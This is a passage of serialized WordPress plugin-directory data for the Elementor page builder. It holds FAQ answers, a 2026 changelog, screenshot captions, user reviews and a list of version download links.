in Google PageSpeed Insight in version 3.1, to a score of 95 i in version 3.5.</p>\n</p>\n<dt id=\"is%20my%20site%20secure%20with%20elementor%20editor%3F\">\nIs my site secure with Elementor Editor?\n</h4>\n<p>\n<p>The security of your website is extremely important to us and we take proactive measures to assure that your websites are secure. Elementor is ISO 27001 certified, and has a dedicated team of security professionals that implements industry best-practices for maximum security and compliance, 24/7.</p>\n<p>There is also a managed security Bug Bounty program, utilizing the community power by enabling 24/7/365 crowdsourced vulnerability detection.</p>\n</p>\n<dt id=\"can%20i%20buy%20templates%20separately%3F\">\nCan I buy templates separately?\n</h4>\n<p>\n<p>Of course, you can use any template that supports Elementor Editor.</p>\n</p>\n<dt id=\"is%20elementor%20editor%20compatible%20with%20post%20and%20custom%20post%20types%3F\">\nIs Elementor Editor compatible with Post and Custom Post Types?\n</h4>\n<p>\n<p>Of course! You can set which post types will enable Elementor in the settings page.</p>\n</p>\n<dt id=\"what%20is%20the%20difference%20between%20elementor%27s%20free%20editor%20plugin%20and%20elementor%20editor%20pro%3F\">\nWhat is the difference between Elementor’s free Editor plugin and Elementor Editor Pro?\n</h4>\n<p>\n<p>Elementor Editor’s Free version allows you to explore our revolutionary drag & drop live editor, basic widgets and templates. Elementor Editor Pro (Essential, Advanced, Expert, Studio, and Agency) empowers you with more professional tools that speed up your workflow, give you access to human-powered support, help you build more advanced content, and convert visitors. See full comparison here.</p>\n</p>\n<dt id=\"how%20can%20i%20become%20a%20contributor%3F\">\nHow can I become a Contributor?\n</h4>\n<p>\n<p>If you want to contribute, go to our <a href=\"https://github.com/elementor/elementor\" rel=\"nofollow ugc\">Elementor GitHub Repository</a> and see where you can help.<br />\nYou can also add a new language via <a href=\"https://go.elementor.com/wp-repo-description-tab-wordpress-plugin-translate/\" rel=\"nofollow ugc\">translate.wordpress.org</a>. We’ve built a short guide explaining <a href=\"https://go.elementor.com/wp-repo-description-tab-wordpress-plugin-translate-faq/\" rel=\"nofollow ugc\">how to translate and localize the plugin</a>.</p>\n</p>\n\n\";s:9:\"changelog\";s:2810:\"<h4>3.35.5 – 2026-02-17</h4>\n<ul>\n<li>Security Fix: Improved code security enforcement in global style settings</li>\n<li>Fix: General UI issues in Editor screens in WordPress Admin</li>\n</ul>\n<h4>3.35.4 – 2026-02-11</h4>\n<ul>\n<li>Fix: License activation issues in various scenarios</li>\n<li>Fix: General UI issues in Editor screens in WordPress Admin</li>\n<li>Fix: Inline editing UI issues on canvas – Editor V4</li>\n</ul>\n<h4>3.35.3 – 2026-02-05</h4>\n<ul>\n<li>Fix: Fatal error appears in dashboard widget in WordPress Admin (<a href=\"https://github.com/elementor/elementor/issues/34663\" rel=\"nofollow ugc\">#34663</a>, <a href=\"https://github.com/elementor/elementor/issues/34659\" rel=\"nofollow ugc\">#34659</a>)</li>\n</ul>\n<h4>3.35.2 – 2026-02-05</h4>\n<ul>\n<li>Fix: Editor menu in WordPress admin displays incorrectly in RTL</li>\n</ul>\n<h4>3.35.1 – 2026-02-04</h4>\n<ul>\n<li>Fix: Editor Top Bar does not appear in various scenarios (<a href=\"https://github.com/elementor/elementor/issues/34623\" rel=\"nofollow ugc\">#34623</a>)</li>\n<li>Fix: Fatal error when the PHP <code>mbstring</code> module is missing</li>\n<li>Fix: General UI issues in Editor screens in WordPress Admin</li>\n</ul>\n<h4>3.35.0 – 2026-02-02</h4>\n<ul>\n<li>New: Introducing Components – reusable layout building blocks with global sync and per-instance content overrides – Editor V4</li>\n<li>New: Introducing Inline Editing – edit Atomic Heading and Paragraph text directly on the canvas – Editor V4</li>\n<li>New: Introducing a contextual formatting toolbar for inline text editing, including links and common text styles – Editor V4</li>\n<li>Tweak: Version 4 status updated to Beta and production-ready – Editor V4</li>\n<li>Tweak: Children perspective controls available only for relevant parent elements – Editor V4</li>\n<li>Tweak: <code>:hover</code> styling automatically applies to <code>:focus-visible</code> for improved accessibility – Editor V4</li>\n<li>Tweak: Dynamic tags support added to color picker controls – Editor V4</li>\n<li>Tweak: Link and Button accessibility improvements in Dynamic Tags – Editor V4</li>\n<li>Tweak: Nested Accordion optimizations with Grid in Chrome browser</li>\n<li>Fix: Size link-unlink operations not applying consistently – Editor V4</li>\n<li>Fix: Div Block and Flexbox base styles overriding user settings when viewed from another document – Editor V4</li>\n<li>Fix: Flex and Div blocks lose selection when deleting an assigned class via the Class Manager – Editor V4</li>\n<li>Fix: Container handles not visible when “Overflow: Hidden” is enabled</li>\n</ul>\n<p><a href=\"https://go.elementor.com/full-changelog/\" rel=\"nofollow ugc\">See changelog for all versions.</a></p>\n\";s:11:\"screenshots\";s:3162:\"<ol><li><a href=\"https://ps.w.org/elementor/assets/screenshot-1.gif?rev=3005087\"><img src=\"https://ps.w.org/elementor/assets/screenshot-1.gif?rev=3005087\" alt=\"<strong>Visual Drag and Drop Editor</strong> - Design your website layouts and place any element anywhere on the page for pixel-perfect designs.\"></a><p><strong>Visual Drag and Drop Editor</strong> - Design your website layouts and place any element anywhere on the page for pixel-perfect designs.</p></li><li><a href=\"https://ps.w.org/elementor/assets/screenshot-2.gif?rev=3005087\"><img src=\"https://ps.w.org/elementor/assets/screenshot-2.gif?rev=3005087\" alt=\"<strong>Full Design System</strong> - Enjoy a professional workflow and ensure consistency across your site. Define your settings, use them globally, and instantly adjust them any time.\"></a><p><strong>Full Design System</strong> - Enjoy a professional workflow and ensure consistency across your site. Define your settings, use them globally, and instantly adjust them any time.</p></li><li><a href=\"https://ps.w.org/elementor/assets/screenshot-3.gif?rev=3005087\"><img src=\"https://ps.w.org/elementor/assets/screenshot-3.gif?rev=3005087\" alt=\"<strong>Responsive Design</strong> Fully edit your website and customize the behavior on desktop, tablet, & mobile to optimize the visitor experience on every device.\"></a><p><strong>Responsive Design</strong> Fully edit your website and customize the behavior on desktop, tablet, & mobile to optimize the visitor experience on every device.</p></li><li><a href=\"https://ps.w.org/elementor/assets/screenshot-4.gif?rev=3005087\"><img src=\"https://ps.w.org/elementor/assets/screenshot-4.gif?rev=3005087\" alt=\"<strong>Kits and Templates</strong> - Jumpstart your web creation process or get inspired with professionally-designed templates or full website kits available for your immediate customization.\"></a><p><strong>Kits and Templates</strong> - Jumpstart your web creation process or get inspired with professionally-designed templates or full website kits available for your immediate customization.</p></li><li><a href=\"https://ps.w.org/elementor/assets/screenshot-5.gif?rev=3005087\"><img src=\"https://ps.w.org/elementor/assets/screenshot-5.gif?rev=3005087\" alt=\"<strong>Nested Elements</strong> Leverage Elementor Editor's Nested widgets to place any widget inside the content area of another widget - like Tabs, and Accordion for complete design flexibility.\"></a><p><strong>Nested Elements</strong> Leverage Elementor Editor\'s Nested widgets to place any widget inside the content area of another widget - like Tabs, and Accordion for complete design flexibility.</p></li><li><a href=\"https://ps.w.org/elementor/assets/screenshot-6.gif?rev=3005087\"><img src=\"https://ps.w.org/elementor/assets/screenshot-6.gif?rev=3005087\" alt=\"<strong>Motion Effects</strong> - Add entrance animations and transitions to any element in your website to captivate visitors.\"></a><p><strong>Motion Effects</strong> - Add entrance animations and transitions to any element in your website to captivate visitors.</p></li></ol>\";s:7:\"reviews\";s:14895:\"<div class=\"review\">\n <div class=\"review-head\">\n <div class=\"reviewer-info\">\n <div class=\"review-title-section\">\n <h4 class=\"review-title\">Awesome Builder</h4>\n <div class=\"star-rating\">\n <div class=\"wporg-ratings\" aria-label=\"5 out of 5 stars\" data-title-template=\"%s out of 5 stars\" data-rating=\"5\" style=\"color:#ffb900;\"><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span></div> </div>\n </div>\n <p class=\"reviewer\">\n By <a href=\"https://profiles.wordpress.org/kgshrestha/\"><img alt=\'\' src=\'https://secure.gravatar.com/avatar/2429a3fa23bbb1a73fbaaa1e4a803c7b1ba45ed116b36e26876b6085c48cf767?s=16&d=monsterid&r=g\' srcset=\'https://secure.gravatar.com/avatar/2429a3fa23bbb1a73fbaaa1e4a803c7b1ba45ed116b36e26876b6085c48cf767?s=32&d=monsterid&r=g 2x\' class=\'avatar avatar-16 photo\' height=\'16\' width=\'16\' loading=\'lazy\' decoding=\'async\'/></a><a href=\"https://profiles.wordpress.org/kgshrestha/\" class=\"reviewer-name\">kgshrestha</a> on <span class=\"review-date\">February 23, 2026</span> </p>\n </div>\n </div>\n <div class=\"review-body\"><!-- wp:quote -->\n<blockquote class=\"wp-block-quote\"><!-- wp:paragraph -->\n<p>Since 2017 I\'m using the this Plugin. It\'s very much useful me. </p>\n<!-- /wp:paragraph --></blockquote>\n<!-- /wp:quote --></div>\n</div>\n<div class=\"review\">\n <div class=\"review-head\">\n <div class=\"reviewer-info\">\n <div class=\"review-title-section\">\n <h4 class=\"review-title\">Feature rich plugin. Great support.</h4>\n <div class=\"star-rating\">\n <div class=\"wporg-ratings\" aria-label=\"5 out of 5 stars\" data-title-template=\"%s out of 5 stars\" data-rating=\"5\" style=\"color:#ffb900;\"><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span></div> </div>\n </div>\n <p class=\"reviewer\">\n By <a href=\"https://profiles.wordpress.org/retrovertigo/\"><img alt=\'\' src=\'https://secure.gravatar.com/avatar/b43e6df2fcf839e59d598beef9e175f6fc1f5bc6465d26305e3b865f2b91830c?s=16&d=monsterid&r=g\' srcset=\'https://secure.gravatar.com/avatar/b43e6df2fcf839e59d598beef9e175f6fc1f5bc6465d26305e3b865f2b91830c?s=32&d=monsterid&r=g 2x\' class=\'avatar avatar-16 photo\' height=\'16\' width=\'16\' loading=\'lazy\' decoding=\'async\'/></a><a href=\"https://profiles.wordpress.org/retrovertigo/\" class=\"reviewer-name\">retrovertigo</a> on <span class=\"review-date\">February 18, 2026</span> </p>\n </div>\n </div>\n <div class=\"review-body\"><!-- wp:paragraph -->\n<p>It comes with a rich set of features for authors and has great support!</p>\n<!-- /wp:paragraph --></div>\n</div>\n<div class=\"review\">\n <div class=\"review-head\">\n <div class=\"reviewer-info\">\n <div class=\"review-title-section\">\n <h4 class=\"review-title\">Poor plugin</h4>\n <div class=\"star-rating\">\n <div class=\"wporg-ratings\" aria-label=\"1 out of 5 stars\" data-title-template=\"%s out of 5 stars\" data-rating=\"1\" style=\"color:#ffb900;\"><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-empty\"></span><span class=\"star dashicons dashicons-star-empty\"></span><span class=\"star dashicons dashicons-star-empty\"></span><span class=\"star dashicons dashicons-star-empty\"></span></div> </div>\n </div>\n <p class=\"reviewer\">\n By <a href=\"https://profiles.wordpress.org/zipname/\"><img alt=\'\' src=\'https://secure.gravatar.com/avatar/8b1e45cc5440b23af48e8b50e0f49741fb07bbde468fcc08a58757342e4e7e90?s=16&d=monsterid&r=g\' srcset=\'https://secure.gravatar.com/avatar/8b1e45cc5440b23af48e8b50e0f49741fb07bbde468fcc08a58757342e4e7e90?s=32&d=monsterid&r=g 2x\' class=\'avatar avatar-16 photo\' height=\'16\' width=\'16\' loading=\'lazy\' decoding=\'async\'/></a><a href=\"https://profiles.wordpress.org/zipname/\" class=\"reviewer-name\">zipname</a> on <span class=\"review-date\">February 15, 2026</span> </p>\n </div>\n </div>\n <div class=\"review-body\"><!-- wp:paragraph -->\n<p>Poor plugin</p>\n<!-- /wp:paragraph --></div>\n</div>\n<div class=\"review\">\n <div class=\"review-head\">\n <div class=\"reviewer-info\">\n <div class=\"review-title-section\">\n <h4 class=\"review-title\">hello every body</h4>\n <div class=\"star-rating\">\n <div class=\"wporg-ratings\" aria-label=\"5 out of 5 stars\" data-title-template=\"%s out of 5 stars\" data-rating=\"5\" style=\"color:#ffb900;\"><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span></div> </div>\n </div>\n <p class=\"reviewer\">\n By <a href=\"https://profiles.wordpress.org/mahdyfarsian/\"><img alt=\'\' src=\'https://secure.gravatar.com/avatar/89c979277be6943f8b95978d202f7ac4f1e1a9cd3cc0dce1225c51c8317c810e?s=16&d=monsterid&r=g\' srcset=\'https://secure.gravatar.com/avatar/89c979277be6943f8b95978d202f7ac4f1e1a9cd3cc0dce1225c51c8317c810e?s=32&d=monsterid&r=g 2x\' class=\'avatar avatar-16 photo\' height=\'16\' width=\'16\' loading=\'lazy\' decoding=\'async\'/></a><a href=\"https://profiles.wordpress.org/mahdyfarsian/\" class=\"reviewer-name\">mahdyfarsian</a> on <span class=\"review-date\">February 13, 2026</span> </p>\n </div>\n </div>\n <div class=\"review-body\"><!-- wp:paragraph -->\n<p>hi</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>I am very happy because I use WordPress.</p>\n<!-- /wp:paragraph --></div>\n</div>\n<div class=\"review\">\n <div class=\"review-head\">\n <div class=\"reviewer-info\">\n <div class=\"review-title-section\">\n <h4 class=\"review-title\">Terrible the last update</h4>\n <div class=\"star-rating\">\n <div class=\"wporg-ratings\" aria-label=\"3 out of 5 stars\" data-title-template=\"%s out of 5 stars\" data-rating=\"3\" style=\"color:#ffb900;\"><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-empty\"></span><span class=\"star dashicons dashicons-star-empty\"></span></div> </div>\n </div>\n <p class=\"reviewer\">\n By <a href=\"https://profiles.wordpress.org/wiperelite/\"><img alt=\'\' src=\'https://secure.gravatar.com/avatar/f43d96e5456b5582f3aa0ca01a6feb6455258545cc959a67683ae77968731ba4?s=16&d=monsterid&r=g\' srcset=\'https://secure.gravatar.com/avatar/f43d96e5456b5582f3aa0ca01a6feb6455258545cc959a67683ae77968731ba4?s=32&d=monsterid&r=g 2x\' class=\'avatar avatar-16 photo\' height=\'16\' width=\'16\' loading=\'lazy\' decoding=\'async\'/></a><a href=\"https://profiles.wordpress.org/wiperelite/\" class=\"reviewer-name\">wiperelite</a> on <span class=\"review-date\">February 13, 2026</span> </p>\n </div>\n </div>\n <div class=\"review-body\"><!-- wp:paragraph -->\n<p>The last update is terrible, templates function now is very uncomfortable.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Pls return elementor as last version, this is so annoying.</p>\n<!-- /wp:paragraph --></div>\n</div>\n<div class=\"review\">\n <div class=\"review-head\">\n <div class=\"reviewer-info\">\n <div class=\"review-title-section\">\n <h4 class=\"review-title\">Warning - hard to cancel!!!</h4>\n <div class=\"star-rating\">\n <div class=\"wporg-ratings\" aria-label=\"1 out of 5 stars\" data-title-template=\"%s out of 5 stars\" data-rating=\"1\" style=\"color:#ffb900;\"><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-empty\"></span><span class=\"star dashicons dashicons-star-empty\"></span><span class=\"star dashicons dashicons-star-empty\"></span><span class=\"star dashicons dashicons-star-empty\"></span></div> </div>\n </div>\n <p class=\"reviewer\">\n By <a href=\"https://profiles.wordpress.org/hansnilsson/\"><img alt=\'\' src=\'https://secure.gravatar.com/avatar/a84ed7092906331f2a5efa885af09efeb47175ef90abe2cc3c58ad4c082e220b?s=16&d=monsterid&r=g\' srcset=\'https://secure.gravatar.com/avatar/a84ed7092906331f2a5efa885af09efeb47175ef90abe2cc3c58ad4c082e220b?s=32&d=monsterid&r=g 2x\' class=\'avatar avatar-16 photo\' height=\'16\' width=\'16\' loading=\'lazy\' decoding=\'async\'/></a><a href=\"https://profiles.wordpress.org/hansnilsson/\" class=\"reviewer-name\">hansnilsson</a> on <span class=\"review-date\">February 9, 2026</span> </p>\n </div>\n </div>\n <div class=\"review-body\"><!-- wp:paragraph -->\n<p>Before you buy this, be sure you don\'t want to cancel it within years because it is a pain to cancel the subscription!</p>\n<!-- /wp:paragraph --></div>\n</div>\n<div class=\"review\">\n <div class=\"review-head\">\n <div class=\"reviewer-info\">\n <div class=\"review-title-section\">\n <h4 class=\"review-title\">They do it well</h4>\n <div class=\"star-rating\">\n <div class=\"wporg-ratings\" aria-label=\"5 out of 5 stars\" data-title-template=\"%s out of 5 stars\" data-rating=\"5\" style=\"color:#ffb900;\"><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span></div> </div>\n </div>\n <p class=\"reviewer\">\n By <a href=\"https://profiles.wordpress.org/queseo/\"><img alt=\'\' src=\'https://secure.gravatar.com/avatar/669bdbd1cc8cefd7cdab6c449557a2fda97d7bff797f429b73325c46341a43ec?s=16&d=monsterid&r=g\' srcset=\'https://secure.gravatar.com/avatar/669bdbd1cc8cefd7cdab6c449557a2fda97d7bff797f429b73325c46341a43ec?s=32&d=monsterid&r=g 2x\' class=\'avatar avatar-16 photo\' height=\'16\' width=\'16\' loading=\'lazy\' decoding=\'async\'/></a><a href=\"https://profiles.wordpress.org/queseo/\" class=\"reviewer-name\">Queseo <small>(queseo)</small></a> on <span class=\"review-date\">February 7, 2026</span> </p>\n </div>\n </div>\n <div class=\"review-body\"><!-- wp:paragraph -->\n<p>They create an easy, powerfull and fast plugin for design and create pages with WordPress</p>\n<!-- /wp:paragraph --></div>\n</div>\n<div class=\"review\">\n <div class=\"review-head\">\n <div class=\"reviewer-info\">\n <div class=\"review-title-section\">\n <h4 class=\"review-title\">Makes Website Building Easy</h4>\n <div class=\"star-rating\">\n <div class=\"wporg-ratings\" aria-label=\"5 out of 5 stars\" data-title-template=\"%s out of 5 stars\" data-rating=\"5\" style=\"color:#ffb900;\"><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span></div> </div>\n </div>\n <p class=\"reviewer\">\n By <a href=\"https://profiles.wordpress.org/smhcis/\"><img alt=\'\' src=\'https://secure.gravatar.com/avatar/ed22b175b73169d65e94c1459c8247627543116330f357390d06142da40ed3b5?s=16&d=monsterid&r=g\' srcset=\'https://secure.gravatar.com/avatar/ed22b175b73169d65e94c1459c8247627543116330f357390d06142da40ed3b5?s=32&d=monsterid&r=g 2x\' class=\'avatar avatar-16 photo\' height=\'16\' width=\'16\' loading=\'lazy\' decoding=\'async\'/></a><a href=\"https://profiles.wordpress.org/smhcis/\" class=\"reviewer-name\">smhcis</a> on <span class=\"review-date\">February 5, 2026</span> </p>\n </div>\n </div>\n <div class=\"review-body\"><!-- wp:paragraph -->\n<p>Elementor makes it easy to make flexible, attractive websites. The huge number of features means I don\'t have to install a dozen different plugins because the widget or function I need is probably already included!</p>\n<!-- /wp:paragraph --></div>\n</div>\n<div class=\"review\">\n <div class=\"review-head\">\n <div class=\"reviewer-info\">\n <div class=\"review-title-section\">\n <h4 class=\"review-title\">very easy</h4>\n <div class=\"star-rating\">\n <div class=\"wporg-ratings\" aria-label=\"5 out of 5 stars\" data-title-template=\"%s out of 5 stars\" data-rating=\"5\" style=\"color:#ffb900;\"><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-filled\"></span></div> </div>\n </div>\n <p class=\"reviewer\">\n By <a href=\"https://profiles.wordpress.org/mohamadkamn1369/\"><img alt=\'\' src=\'https://secure.gravatar.com/avatar/e56f25ca1a361de4fc4cb51ec83370b694f724581c55ff393163d46f5510eaba?s=16&d=monsterid&r=g\' srcset=\'https://secure.gravatar.com/avatar/e56f25ca1a361de4fc4cb51ec83370b694f724581c55ff393163d46f5510eaba?s=32&d=monsterid&r=g 2x\' class=\'avatar avatar-16 photo\' height=\'16\' width=\'16\' loading=\'lazy\' decoding=\'async\'/></a><a href=\"https://profiles.wordpress.org/mohamadkamn1369/\" class=\"reviewer-name\">mohamadkamn1369</a> on <span class=\"review-date\">February 5, 2026</span> </p>\n </div>\n </div>\n <div class=\"review-body\"><!-- wp:paragraph -->\n<p>im happy to use wordpress as website develooper </p>\n<!-- /wp:paragraph --></div>\n</div>\n<div class=\"review\">\n <div class=\"review-head\">\n <div class=\"reviewer-info\">\n <div class=\"review-title-section\">\n <h4 class=\"review-title\">Wonderful</h4>\n <div class=\"star-rating\">\n <div class=\"wporg-ratings\" aria-label=\"1 out of 5 stars\" data-title-template=\"%s out of 5 stars\" data-rating=\"1\" style=\"color:#ffb900;\"><span class=\"star dashicons dashicons-star-filled\"></span><span class=\"star dashicons dashicons-star-empty\"></span><span class=\"star dashicons dashicons-star-empty\"></span><span class=\"star dashicons dashicons-star-empty\"></span><span class=\"star dashicons dashicons-star-empty\"></span></div> </div>\n </div>\n <p class=\"reviewer\">\n By <a href=\"https://profiles.wordpress.org/keyascii/\"><img alt=\'\' src=\'https://secure.gravatar.com/avatar/8aede766e37ca20411e18ce027e1b1cb5e9eb58cefe14f7a980339726551b0db?s=16&d=monsterid&r=g\' srcset=\'https://secure.gravatar.com/avatar/8aede766e37ca20411e18ce027e1b1cb5e9eb58cefe14f7a980339726551b0db?s=32&d=monsterid&r=g 2x\' class=\'avatar avatar-16 photo\' height=\'16\' width=\'16\' loading=\'lazy\' decoding=\'async\'/></a><a href=\"https://profiles.wordpress.org/keyascii/\" class=\"reviewer-name\">keyascii</a> on <span class=\"review-date\">February 3, 2026</span> </p>\n </div>\n </div>\n <div class=\"review-body\"><!-- wp:paragraph -->\n<p>Does not work. Simply. If I create a new template, it is not managed as a popup</p>\n<!-- /wp:paragraph --></div>\n</div>\n\";}s:17:\"short_description\";s:145:\"The Elementor Website Builder has it all: drag and drop page builder, pixel perfect design, mobile responsive editing, and more. Get started now!\";s:13:\"download_link\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.35.5.zip\";s:14:\"upgrade_notice\";a:0:{}s:11:\"screenshots\";a:6:{i:1;a:2:{s:3:\"src\";s:62:\"https://ps.w.org/elementor/assets/screenshot-1.gif?rev=3005087\";s:7:\"caption\";s:144:\"<strong>Visual Drag and Drop Editor</strong> - Design your website layouts and place any element anywhere on the page for pixel-perfect designs.\";}i:2;a:2:{s:3:\"src\";s:62:\"https://ps.w.org/elementor/assets/screenshot-2.gif?rev=3005087\";s:7:\"caption\";s:185:\"<strong>Full Design System</strong> - Enjoy a professional workflow and ensure consistency across your site. Define your settings, use them globally, and instantly adjust them any time.\";}i:3;a:2:{s:3:\"src\";s:62:\"https://ps.w.org/elementor/assets/screenshot-3.gif?rev=3005087\";s:7:\"caption\";s:170:\"<strong>Responsive Design</strong> Fully edit your website and customize the behavior on desktop, tablet, & mobile to optimize the visitor experience on every device.\";}i:4;a:2:{s:3:\"src\";s:62:\"https://ps.w.org/elementor/assets/screenshot-4.gif?rev=3005087\";s:7:\"caption\";s:193:\"<strong>Kits and Templates</strong> - Jumpstart your web creation process or get inspired with professionally-designed templates or full website kits available for your immediate customization.\";}i:5;a:2:{s:3:\"src\";s:62:\"https://ps.w.org/elementor/assets/screenshot-5.gif?rev=3005087\";s:7:\"caption\";s:197:\"<strong>Nested Elements</strong> Leverage Elementor Editor\'s Nested widgets to place any widget inside the content area of another widget - like Tabs, and Accordion for complete design flexibility.\";}i:6;a:2:{s:3:\"src\";s:62:\"https://ps.w.org/elementor/assets/screenshot-6.gif?rev=3005087\";s:7:\"caption\";s:127:\"<strong>Motion Effects</strong> - Add entrance animations and transitions to any element in your website to captivate visitors.\";}}s:4:\"tags\";a:5:{s:13:\"drag-and-drop\";s:13:\"drag-and-drop\";s:6:\"editor\";s:6:\"editor\";s:9:\"elementor\";s:9:\"elementor\";s:12:\"landing-page\";s:12:\"landing page\";s:12:\"page-builder\";s:12:\"page builder\";}s:8:\"versions\";a:405:{s:5:\"3.0.0\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.0.0.zip\";s:5:\"3.0.1\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.0.1.zip\";s:6:\"3.0.10\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.0.10.zip\";s:6:\"3.0.11\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.0.11.zip\";s:6:\"3.0.12\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.0.12.zip\";s:6:\"3.0.13\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.0.13.zip\";s:6:\"3.0.14\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.0.14.zip\";s:6:\"3.0.15\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.0.15.zip\";s:6:\"3.0.16\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.0.16.zip\";s:5:\"3.0.2\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.0.2.zip\";s:5:\"3.0.3\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.0.3.zip\";s:5:\"3.0.4\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.0.4.zip\";s:5:\"3.0.5\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.0.5.zip\";s:5:\"3.0.6\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.0.6.zip\";s:5:\"3.0.7\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.0.7.zip\";s:5:\"3.0.8\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.0.8.zip\";s:7:\"3.0.8.1\";s:60:\"https://downloads.wordpress.org/plugin/elementor.3.0.8.1.zip\";s:5:\"3.0.9\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.0.9.zip\";s:5:\"3.1.0\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.1.0.zip\";s:11:\"3.1.0-beta1\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.1.0-beta1.zip\";s:11:\"3.1.0-beta2\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.1.0-beta2.zip\";s:11:\"3.1.0-beta3\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.1.0-beta3.zip\";s:11:\"3.1.0-beta4\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.1.0-beta4.zip\";s:10:\"3.1.0-dev1\";s:63:\"https://downloads.wordpress.org/plugin/elementor.3.1.0-dev1.zip\";s:10:\"3.1.0-dev2\";s:63:\"https://downloads.wordpress.org/plugin/elementor.3.1.0-dev2.zip\";s:10:\"3.1.0-dev3\";s:63:\"https://downloads.wordpress.org/plugin/elementor.3.1.0-dev3.zip\";s:5:\"3.1.1\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.1.1.zip\";s:5:\"3.1.2\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.1.2.zip\";s:5:\"3.1.3\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.1.3.zip\";s:5:\"3.1.4\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.1.4.zip\";s:6:\"3.10.0\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.10.0.zip\";s:11:\"3.10.0-dev1\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.10.0-dev1.zip\";s:6:\"3.10.1\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.10.1.zip\";s:6:\"3.10.2\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.10.2.zip\";s:6:\"3.11.0\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.11.0.zip\";s:12:\"3.11.0-beta1\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.11.0-beta1.zip\";s:12:\"3.11.0-beta2\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.11.0-beta2.zip\";s:12:\"3.11.0-beta3\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.11.0-beta3.zip\";s:11:\"3.11.0-dev1\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.11.0-dev1.zip\";s:11:\"3.11.0-dev2\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.11.0-dev2.zip\";s:11:\"3.11.0-dev3\";s:64:\"https://downloads.wordpress.org/plugin/elementor.3.11.0-dev3.zip\";s:6:\"3.11.1\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.11.1.zip\";s:6:\"3.11.2\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.11.2.zip\";s:6:\"3.11.3\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.11.3.zip\";s:6:\"3.11.4\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.11.4.zip\";s:6:\"3.11.5\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.11.5.zip\";s:6:\"3.12.0\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.12.0.zip\";s:6:\"3.12.1\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.12.1.zip\";s:6:\"3.12.2\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.12.2.zip\";s:6:\"3.13.0\";s:59:\"https://downloads.wordpress.org/plugin/elementor.3.13.0.zip\";s:12:\"3.13.0-beta1\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.13.0-beta1.zip\";s:12:\"3.13.0-beta2\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.13.0-beta2.zip\";s:12:\"3.13.0-beta3\";s:65:\"https://downloads.wordpress.org/plugin/elementor.3.13.0